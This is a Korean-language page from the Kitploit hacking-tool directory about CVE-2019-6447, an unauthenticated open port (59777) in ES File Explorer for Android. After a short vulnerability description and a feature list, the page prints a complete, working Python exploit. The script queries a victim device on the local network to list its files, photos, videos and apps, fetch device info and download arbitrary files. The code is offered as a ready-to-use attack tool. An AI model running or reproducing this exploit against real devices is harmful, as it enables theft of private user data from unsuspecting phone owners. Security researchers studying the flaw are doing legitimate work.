Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
EsFileExplorer-CVE-2019-6447 — ES File Explorer의 Android 취약점 악용 | Kitploit
도구/GitHubGitHub/chethine/esfileexplorer-cve-2019-6447
Android SecurityVulnerability AnalysisExploitationData ExfiltrationInformation GatheringMobile Security
GitHubchethine/esfileexplorer-cve-2019-6447

EsFileExplorer-CVE-2019-6447

ES File Explorer의 Android 취약점 악용

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
31364년 전아직 검토되지 않음

EsFileExplorer-CVE-2019-6447

ES 파일 탐색기에서 Android 취약점 악용

취약점

ES 파일 탐색기는 DO Global의 일부이며 중국에 기반을 둔 ES worldwide에서 만들었습니다. 이 ES 파일 탐색기는 Android 운영 체제를 실행하는 모바일 장치에서만 사용할 수 있습니다. 현재 ES 파일 탐색기는 총 1억 회 이상 다운로드되었습니다. 이 애플리케이션은 Android의 유명한 파일 탐색기이므로 많은 주목을 받고 있습니다. 반면에 2019년 사이버 보안 전문 연구원들은 ES File Explorer 4.1.9.7.4 버전에서 취약점을 발견했습니다. 이 취약점을 악용할 수 있는 공격자는 ES 파일 탐색기에 저장된 모든 민감한 사용자 데이터를 수집할 수 있습니다. 여기에는 사진, 비디오, 음성 녹음, 문서 및 기타 데이터 유형이 포함됩니다.

취약점 설명

Android용 ES File Explorer File Manager 애플리케이션은 4.1.9.7.4 버전까지 로컬 Wi-Fi 네트워크의 원격 공격자가 TCP 포트 59777에 쿼리를 보내 임의의 파일을 읽거나 앱을 실행할 수 있도록 합니다. ES 애플리케이션이 한 번만 실행된 후에도 이 TCP 포트는 계속 열려 있으며 HTTP를 통해 전송된 인증되지 않은 application/json 데이터에 응답합니다.

영향을 받는 버전

4.1.9.7.4 버전

사용자가 앱을 실행할 때마다 HTTP 서버가 시작됩니다. 이 서버는 로컬에서 포트 59777을 엽니다:
root@kitploit:~
angler:/ # netstat -ap | grep com.estrongs
tcp6       0      0 :::59777                :::*                    LISTEN      5696/com.estrongs.android.pop

개념 증명(POC) 기능

  • 피해자 장치의 sdcard에 있는 모든 파일 나열
  • 피해자 장치의 모든 사진 나열
  • 피해자 장치의 모든 비디오 나열
  • 피해자 장치의 모든 오디오 파일 나열
  • 피해자 장치에 설치된 모든 앱 나열
  • 피해자 장치에 설치된 모든 시스템 앱 나열
  • 피해자 장치에 설치된 모든 전화 앱 나열
  • 피해자 장치의 sdcard에 저장된 모든 apk 파일 나열
  • 피해자 장치에 설치된 모든 앱 나열
  • 피해자 장치의 장치 정보 가져오기
  • 피해자 장치에서 파일 가져오기
  • 선택한 앱 실행
  • 선택한 앱의 아이콘 가져오기

Payload

root@kitploit:~
import requests
import json
import ast
import sys

if len(sys.argv) < 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
    sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
if cmd not in cmds:
    print("[-] WRONG COMMAND!")
    print("Available commands : ")
    print("  listFiles         : List all Files.")
    print("  listPics          : List all Pictures.")
    print("  listVideos        : List all videos.")
    print("  listAudios        : List all audios.")
    print("  listApps          : List Applications installed.")
    print("  listAppsSystem    : List System apps.")
    print("  listAppsPhone     : List Communication related apps.")
    print("  listAppsSdcard    : List apps on the SDCard.")
    print("  listAppsAll       : List all Application.")
    print("  getFile           : Download a file.")
    print("  getDeviceInfo     : Get device info.")
    sys.exit(1)

print("\n==================================================================")
print("|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |")
print("|                Coded By : Nehal a.k.a PwnerSec                 |")
print("==================================================================\n")

header = {"Content-Type" : "application/json"}
proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}

def httpPost(cmd):
    data = json.dumps({"command":cmd})
    response = requests.post(url, headers=header, data=data)
    return ast.literal_eval(response.text)

def parse(text, keys):
    for dic in text:
        for key in keys:
            print(f"{key} : {dic[key]}")
        print('')

def do_listing(cmd):
    response = httpPost(cmd)
    if len(response) == 0:
        keys = []
    else:
        keys = list(response[0].keys())
    parse(response, keys)

if cmd in listCmds:
    do_listing(cmd)

elif cmd == cmds[9]:
    if len(sys.argv) != 4:
        print("[+] Include file name to download.")
        sys.exit(1)
    elif sys.argv[3][0] != '/':
        print("[-] You need to provide full path of the file.")
        sys.exit(1)
    else:
        path = sys.argv[3]
        print("[+] Downloading file...")
        response = requests.get(url + path)
        with open('out.dat','wb') as wf:
            wf.write(response.content)
        print("[+] Done. Saved as `out.dat`.")

elif cmd == cmds[10]:
    response = httpPost(cmd)
    keys = list(response.keys())
    for key in keys:
        print(f"{key} : {response[key]}")

Demonstration

Demo

Contact Me

Twitter에서 저를 팔로우하세요!
LinkedIn에서 저와 연결하세요!
도구 다운로드